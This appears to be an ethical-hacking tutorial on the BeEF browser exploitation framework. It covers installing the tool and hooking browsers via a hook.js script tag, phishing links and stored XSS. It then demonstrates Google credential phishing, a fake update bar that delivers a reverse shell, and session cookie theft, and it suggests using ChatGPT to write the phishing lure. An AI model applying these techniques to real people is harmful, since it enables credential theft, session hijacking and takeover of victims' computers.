If you want to use the BeEF hacking tool effectively, you've come to the right place. This article is here to help you make the most out of this framework.
We will explain what BeEF is, how to install it, and how to start it up. We will explore the BeEF web interface and discuss its different components. Additionally, we will explain how BeEF can hook into web browsers, and provide two methods to achieve this.
Furthermore, we will demonstrate three specific use cases of BeEF: Google phishing, creating a fake notification bar that leads to a reverse shell, and stealing session cookies.
So, if you're ready to delve into this client-side framework, let's get started.
What Is BeEF
BeEF, the Browser Exploitation Framework, is a tool ethical hackers use to assess and exploit vulnerabilities within web browsers.
Unlike many other security tools focusing on system or server-side vulnerabilities, BeEF focuses on the client side – specifically, the user's web browser. This is significant because even if a system's network or operating system is secure, vulnerabilities in a web browser can still provide an attacker with a way into the network or system.
For other Kali tools, see our post on the 25 Top Penetration Testing Tools for Kali Linux in 2023.
For ethical hackers, BeEF provides several benefits:
In-Depth Browser Analysis: BeEF can provide detailed information about the hooked browsers, such as the browser type, version, installed plugins, whether the browser is running over Tor, cookies, etc.
Client-Side Exploitation: BeEF has numerous command modules that can aid in exploiting web browsers. These modules can perform various tasks such as stealing cookies, conducting social engineering attacks, launching network attacks, and more.
Real-World Simulation: BeEF allows ethical hackers to mimic real-world attack scenarios, helping organizations understand their risk postures better.
Persistent Access: BeEF can maintain control over a hooked browser even if an IP changes, providing ongoing access to the target for further exploits.
Easy-to-Use Interface: The BeEF interface is web-based and user-friendly, making it easier to manage hooked browsers and execute command modules.
BeEF isn’t currently installed on Kali at this time. Ensure you run an update before installing by using the command:
sudo apt update
You can install BeEF with the following command:
sudo apt install beef-xss
Once BeEF is installed, you can run it by using:
When running the program for the first time, you will be prompted to change the default password for the ‘beef’ user.
Once you change the password, BeEF will start loading, and you will be presented with both the WebUI address and the hook script for ‘hook.js.’
Web UI: http://127.0.0.1:3000/ui/panel
Hook: <script src="https://127.0.0.1:3000/hook.js"></script>
Before you use the hook script, ensure you change the IP to that of the machine running BeEF.
BeEF should open the browser for you, and you will need to log in as the user ‘beef’ with the new password you set up before entering the program.
Once successfully logged in, you will be presented with the initial BeEF interface.
Let's look at the different sections within BeEF.
- Hooked Browsers: This is where you'll see a list of all currently hooked browsers. Each browser is listed with details such as IP address, browser name, and operating system. As no browsers are hooked up initially, this section will be empty.
- Getting Started: This section provides guidance on how to use the BeEF framework. It includes information on how to hook a browser and use command modules.
- Logs: This section shows a log of the BeEF activity. This includes interactions with the target browsers, commands sent, responses received, and any errors or important system messages.
- Zombies: In BeEF terminology, a "zombie" is a hooked browser that the BeEF server controls. The "Zombies" section lists these browsers and allows you to interact with them. As no browsers are hooked yet, this section will also be empty.
- Basic: This view provides basic information about the hooked browser, such as the IP address, browser type, and operating system. In this view, you can also use the available command modules to interact with the hooked browser.
- Requester: The "Requester" view lets you manually craft and send HTTP requests from the hooked browser. This can be useful for exploring the website or web application from the perspective of the hooked browser, testing access controls, or performing other manual testing tasks.
Once you've hooked a browser, the "Hooked Browsers" and "Zombies" sections will be populated with information, and you'll be able to interact with the hooked browsers using the BeEF command modules.
The techniques and knowledge shared in this article should only be employed on systems for which you have obtained explicit permissions or on systems you own the rights to conduct testing.
Unauthorized access is illegal and could lead to legal implications. We strongly urge you to respect digital boundaries.
Hooking Web Browsers with BeEF
Now that you know how to install and start BeEF, let’s explore how to exploit a browser by hooking into it.
What Is Browser Exploitation?
Browser exploitation refers to taking advantage of security vulnerabilities in a web browser to perform unauthorized actions. This can involve various techniques, typically to gain control over the browser or the system on which it's running or to steal sensitive information.
The basic concept behind browser exploitation is that a web browser, like any software, can have flaws or vulnerabilities in its code. These vulnerabilities could cause the browser to behave in unintended ways.
Hooking the Browser
BeEF provides links to demo pages within the "Getting Started" section we can use to show proof of concept. In a real-world application, setting up a website or web server to serve the ‘hook.js’ code is a more legitimate way of tricking the victim into being hooked.
This can be accomplished by creating a website, adding the hook script to the header of the page, and then having the victim visit the site by means of a phishing attack. This could be through a link via email, Social Media, or other means.
First, let's copy the link for the advanced demo page. You must change the IP address to the one from your attacking machine. This page includes the embedded hook.js script.
Next, you need to find a way for the user to click on this link. How about crafting a Phishing email with the help of ChatGPT to company employees, letting them know about a contest?
If you want to see other ways to use Social Engineering, see our post Unlock SET: How to Use The Social Engineer Toolkit.
We can disguise the original URL by using a URL shortener.
Once the user clicks on the link, they won’t be taken to a contest page but to the BeEF demo page, and then it’s game over because we will now have control over their browser.
We could get creative here and create a legitimate-looking contest form, enabling us to hook into the user’s browser and harvest some information via the form simultaneously.
Once the user’s browser is hooked, the browser appears in the BeEF console.
From the details pane, BeEF provides us with a wealth of information. Valuable insights include the browser being utilized, its version, the operating system it runs on, its architecture, platform information, language details, installed plugins, and much more.
Hooking With XSS
Let’s look at how an attacker could use stored XSS and BeEF to hook a browser. This method can be very effective as it can infect many users.
When the victim's browser visits the site, it loads the file and hooks the browser, enabling us to execute various commands to launch attacks or exfiltrate data.
Check out this video: "How Your Browser Gets HACKED!"
Exploiting Browser Sessions With BeEF
BeEF comes preloaded with over three hundred modules that you can run depending on the browser hooked. These are broken down into twelve categories, including: “Exploits, Network, and Social Engineering.”
The command modules all include a traffic light icon to show whether these will be invisible and whether they will work within the target browser.
We will show you how to use three of these modules.
The Google Phishing command is a module within BeEF that aims to trick the user of a hooked browser into revealing their Google credentials.
Let’s execute the command, and on the victim’s browser, they should be presented with the fake login page.
If the user attempts to sign in, we will have their credentials in the command results tab of the “Google Phishing” module.
Fake Notification Bar
The Fake Notification Bar command is another module within BeEF designed for social engineering attacks.
When this module is executed on a hooked browser, it displays a fake notification bar at the top of the target browser window. The content of this notification bar can be customized and designed to trick the user into clicking a link or downloading a file.
For our demo, we will be using a reverse shell payload. If the user is tricked into downloading and running the file, it will open a reverse shell to our machine. A reverse shell allows us to execute commands remotely on the victim's system, giving us complete control over it.
For more information on reverse shells, see our reverse shell cheat sheet.
We will use the “Fake Notification Bar (Firefox)” module as the user’s browser is Firefox, but you choose which applies to your situation.
Please ensure that you set the “Plugin URL” to the location of the reverse shell. You can leave the “Notification text” or change it to fit your needs.
We changed our text to read: Critical Security Alert: Your Firefox browser is critically outdated! Click here to install the urgent security update now.
Once we click ‘Execute,” the user will be presented with a notification bar.
The user will be prompted to install the plugin by saving the file to their computer.
Once the user attempts to install the update, we will have a reverse Meterpreter shell giving us full control of the user’s system.
Session cookies, also known as temporary cookies, store information about a user's activity for a single browsing session. They help websites remember a user's actions, such as login information or items added to a shopping cart and are deleted when the browser is closed.
We can use the “Get Cookie” module within BeEF to steal session cookies from the user’s browser. Select “Get Cookie” and press the “Execute” button. The session cookies will be displayed in the “Command results” window.
From an attacker’s perspective, these cookies are valuable as having them allows the attacker to impersonate a user on a website (such as an e-commerce site or the member section of a forum) by taking over the session.
The Browser Exploitation Framework, or BeEF, is a powerful tool for ethical hackers, providing a range of capabilities for exploring and hacking web browsers' vulnerabilities.
Throughout this article, we've shown you how to use the BeEF tool and use it to perform three different attacks, one of which enables you to take full control of the user's computer.
However, the capabilities of BeEF extend far beyond what we've explored here. Diving deeper into its options and functionalities can significantly enhance your proficiency using the BeEF hacking tool.
By investing time in experimenting with and understanding these additional features, you can elevate your skills and expand your toolkit.
We highly recommend the following courses to learn more about ethical hacking and social engineering tools like BeEF.